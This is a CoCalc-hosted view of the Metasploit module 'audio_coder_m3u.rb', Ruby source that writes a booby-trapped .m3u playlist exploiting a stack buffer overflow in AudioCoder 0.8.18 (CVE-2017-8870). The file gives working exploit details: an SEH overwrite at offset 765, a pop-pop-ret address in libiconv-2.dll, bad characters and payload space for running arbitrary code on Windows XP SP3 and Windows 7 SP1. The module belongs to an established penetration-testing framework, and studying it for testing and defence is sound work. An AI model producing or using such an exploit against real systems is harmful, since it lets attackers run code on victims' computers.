CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/audio_coder_m3u.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::FILEFORMAT

10
  include Msf::Exploit::Seh

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'AudioCoder .M3U Buffer Overflow',

15
      'Description'    => %q{

16
          This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability

17
        occurs when adding an .m3u, allowing arbitrary code execution with the privileges

18
        of the user running AudioCoder. This module has been tested successfully on

19
        AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.

20
      },

21
      'License'        => MSF_LICENSE,

22
      'Author'         =>

23
        [

24
          'metacom', # Vulnerability discovery and PoC

25
          'juan vazquez' # Metasploit module

26
        ],

27
      'References'     =>

28
        [

29
          [ 'CVE', '2017-8870' ],

30
          [ 'OSVDB', '92939' ],

31
          [ 'EDB', '25141' ]

32
        ],

33
      'DefaultOptions'  =>

34
        {

35
          'EXITFUNC' => 'process'

36
        },

37
      'Platform'       => 'win',

38
      'Payload'        =>

39
        {

40
          'Space'           => 6596,

41
          'BadChars'        => "\x00\x5c\x40\x0d\x0a",

42
          'DisableNops'     => true,

43
          'StackAdjustment' => -3500,

44
        },

45
      'Targets'        =>

46
        [

47
          [ 'AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1',

48
            {

49
              'Ret'     => 0x66011b56, # ppr from libiconv-2.dll

50
              'Offset'  => 765

51
            }

52
          ]

53
        ],

54
      'Privileged'     => false,

55
      'DisclosureDate' => '2013-05-01',

56
      'DefaultTarget'  => 0))

57


58
    register_options(

59
      [

60
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),

61
      ])

62


63
  end

64


65
  def exploit

66
    buffer = "http://"

67
    buffer << rand_text(target['Offset'])

68
    buffer << generate_seh_record(target.ret)

69
    buffer << payload.encoded

70


71
    file_create(buffer)

72
  end

73
end

74


75